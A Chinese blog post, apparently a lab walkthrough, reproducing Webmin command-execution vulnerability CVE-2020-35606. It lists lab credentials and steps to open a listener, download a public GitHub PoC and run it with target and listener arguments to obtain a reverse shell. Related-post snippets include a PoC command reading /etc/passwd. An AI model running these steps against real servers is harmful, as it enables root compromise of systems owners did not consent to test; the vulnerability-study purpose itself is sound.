Webmin命令执行(CVE-2020-35606)

已于 2024-02-23 15:54:26 修改
阅读量436 收藏
点赞数 1
文章标签: java 开发语言
于 2024-01-31 10:53:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65150886/article/details/135948518
版权

 漏洞描述:

Webmin是Webmin社区的一套基于Web的用于类Unix操作系统中的系统管理工具。Webmin 1.962版本及之前版本存在安全漏洞,该漏洞允许执行任意命令。任何被授权使用Package Updates模块的用户都可以使用根权限通过包含和的向量执行任意命令。 账户密码:root:password

复现过程:

1.访问https://ip:port,出现如下页面,开始实验

2.建立监听端口


3.下载exp,并修改文件内容

https://github.com/KrE80r/webmin_cve-2019-12840_poc

使用前注意修改py文件中的121行的目标端口号和122行的监听端口号

4.运行exp

python3 CVE-2019-12840.py -u https://ip  (目标ip) -p port(目标端口)  -U root -P password -lhost ip(监听ip) -lport port(监听端口)

5.成功监听

如此即可继承Web服务器程序的权限,去执行系统命令或读写文件,通过反弹shell控制整个网站,甚至控制整个服务器。

修复建议:

1.升级版本。

慕筱蚺
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2020-35606漏洞复现,已完结
weixin_51203422的博客
09-27 3022
GitHub - KrE80r/webmin_cve-2019-12840_poc: A standalone POC for CVE-2019-12840A standalone POC for CVE-2019-12840. Contribute to KrE80r/webmin_cve-2019-12840_poc development by creating an account on GitHub.https://github.com/KrE80r/webmin_cve-2019-12840_p
Webmin 命令执行漏洞 (CVE-2020-35606)---复现
菲曼巴的博客
11-24 3480
下载 webmin_pu_escape_bypass_rce.rb (Metasploit) CVE-Mitre 下载链接 漏洞简介: 该模块利用 Webmin 1.962 及更低版本中的任意命令执行漏洞。 任何授权“包更新”模块的用户都可以使用 root 权限执行任意命令。 它是通过规避针对 CVE-2019-12840 采取的措施而出现的。 s/(-)|(.)/string/g; 逃避不足以预防。 因此,由于包名变量直接放置在系统命令中,我们可以使用一些 HTTP 支持的转义字符对其进行操作。 例如,
Webmin 命令执行漏洞 (CVE-2020-35606)
YouthBelief的博客
11-11 4432
Webmin 命令执行漏洞 (CVE-2020-35606) Webmin 命令执行漏洞 (CVE-2020-35606)0x01 漏洞描述0x02 影响范围0x03 漏洞复现使用msf复现利用脚本 成功0x04 漏洞修复 Webmin 命令执行漏洞 (CVE-2020-35606) 0x01 漏洞描述 WebminWebmin社区的一套基于Web的用于类Unix操作系统中的系统管理工具。 Webmin 1.962版本及之前版本存在安全漏洞,该漏洞允许执行任意命令。任何被授权使用Package Updat
漏洞复现-webmin漏洞系列分析与利用
aming小老弟
05-18 2635
webmin远程命令执行漏洞目标简介漏洞描述漏洞利用条件:漏洞复现构造POC构造EXP漏洞分析被植入后门依据修复建议 目标简介 Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作 http://www.webmin.com/ Webmin 是一个用 Perl 编写的基于浏览器的管理应用程序。 是一个基于Web的界面,用于Unix的系统管理。 使用任何支持表和表单的浏览器,可以设置用户帐户,Apache,DNS,文件共享等。 L
CVE-2022-0824 Webmin 远程代码执行漏洞复现
热爱学习,喜欢折腾!
10-11 2199
Webmin是功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。Webmin让您能够在远程使用支持HTTPS (SSL 上的 HTTP)协议的 Web 浏览器通过 Web界面管理您的主机。Webmin是一个功能强大且灵活的基于 Web 的服务器管理控制面板,适用于类Unix系统。Webmin允许用户配置操作系统内部,例如用户、磁盘配额、服务或配置文件,以及修改和控制开源应用程序,例如Apache HTTPServer、PHP或MySQL。
Webmin 远程命令执行漏洞(CVE-2019-15107)
m0_57206390的博客
10-25 391
Webmin是一个用于管理类Unix系统的管理配置工具,具有Web页面。 该漏洞由于password_change.cgi文件在重置密码功能中存在一个代码执行漏洞,该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码。
Webmin远程命令执行漏洞(CVE-2019-15107)复现
qq_24481913的博客
08-01 277
Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。据统计,互联网上大约有13w台机器使用Webmin。当用户开启Webmin密码重置功能后,攻击者可以通过发送POST请求在目标系统中执行任意命令,且无需身份验证。
CVE-2019-15642:Webmin远程执行代码(已认证)
03-10
CVE-2019-15642 Webmin远程执行代码(已认证) python用法: python CVE-2019-15642.py https://xxx.xxx.xxx:10000 "cat /etc/passwd" Webmin的0x01泊坞窗 cd ~/vulhub/webmin/CVE-2019-15107 docker-compose up -...
wireshark抓包(Webmin 远程命令执行漏洞(CVE-2019-15107))
10-12
wireshark抓包(Webmin 远程命令执行漏洞(CVE-2019-15107))
CVE-2019-15107
05-23
CVE-2019-15107 Webmin(1.890-1.920)后门RCE漏洞的Python实现 基于针对相同漏洞利用的Metasploit模块( ) 漏洞利用大多是自动的。 请参阅./CVE-2019-15107.py --help以了解完整的开关范围 警告:此存储库中的...
Webmin with Bacula Integration-开源
05-07
Webmin Plus是Open Country对Webmin的增强。 今天,Webmin的标准版本将接口与流行的开源备份和还原Bacula项目结合在一起。 要获得Webmin的免费副本,请访问Webmin网站www.Webmin.com。
Webmin module for Amanda-开源
05-03
目的是提供一个Webmin模块来配置和管理Amanda Backup System,这是一款出色的备份软件。 通过Webmin界面提供的工具,它将提供一种简单的方法来设置,测试和运行完整的Amanda安装。
Webmin (CVE-2019-15107) 远程命令执行漏洞复现
来日可期的博客
10-13 813
Webmin是一个用于管理类Unix系统的管理配置工具,具有Web页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。访问https://127.0.0.1:10000/password_change.cgi。然后发送数据包后,可以看到在页面的回显中,出现了我们插入的id命令的结果。还可以使用HackBar,发送POST请求包,并添加攻击Payload。访问靶场地址https://127.0.0.1:10000/漏洞影响版本为Webmin
红队打靶:pWnOS1.0打靶思路详解之webmin漏洞利用(vulnhub)
Bossfrank的博客
06-30 912
本文详述了vulhub靶机pWnOS1.0的打靶过程。涉及到知识点包括文件包含漏洞、webmin任意文件泄露、john密码破解、perl反弹shell等。靶机难度不高,但很精良,渗透过程环环相扣,每一步都逻辑清晰。
Webmin 远程命令执行漏洞
jammny
01-16 1469
前言: Webmin是一个用于管理类Unix系统的管理配置工具,具有Web页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。 影响版本: Webmin <= 1.920 漏洞代码: def peer "#{ss1 ? 'https:// : ' http://' }#{rhost}:#{rport}" end # Targe...
02 Breakout VM
CySeker's Blog
04-13 356
这里面有些东西我不知道,所以要写在前面。
Webmin 远程代码执行CVE-2022-0824)漏洞搭建复现+攻击检测原理(流量分析)详细
m0_60884805的博客
09-19 3214
Webmin v1.984 中,影响文件管理器模块,任何没有文件管理器模块访问权限的经过身份验证的低权限用户都可以与文件管理器功能交互,例如从远程 URL 下载文件和更改文件权限 (chmod)。通过在文件管理器中链接这些功能,可以通过精心制作的 .cgi 文件实现远程代码执行
webmin远程命令执行漏洞(CVE-2019-15107)
m0_49025459的博客
12-06 994
漏洞概述 1.漏洞编号:CVE-2019-15107 2.漏洞描述:该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码 该漏洞由于password_change.cgi文件在重置密码功能中存在一个代码执行漏洞,该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码 3、受影响的版本:Webmin
使用hutool工具判断字符串是否全部是字母(包括大小写),java判断字符串是否全部是字母(包括大小写)
最新发布
qq_43700885的博客
07-29 310
1.导入hutool的maven依赖。2.复制一下代码执行
CVE-2022-36554
08-29
CVE-2022-36554是一个安全漏洞,根据提供的引用内容,我没有找到与该漏洞相关的具体信息。请提供更多关于CVE-2022-36554的细节,以便我能够为您提供更准确的答案。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [CVE-2022-33891POCApache Spark 命令注入(CVE-2022-33891)POC](https://download.csdn.net/download/qq_51577576/86396832)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [CVE-2022-36446 Webmin命令注入漏洞复现](https://blog.csdn.net/qq_44281295/article/details/126345900)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [CVE-2022-34265 &CVE-2019-14234 sql注入](https://blog.csdn.net/weixin_53090346/article/details/125760708)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值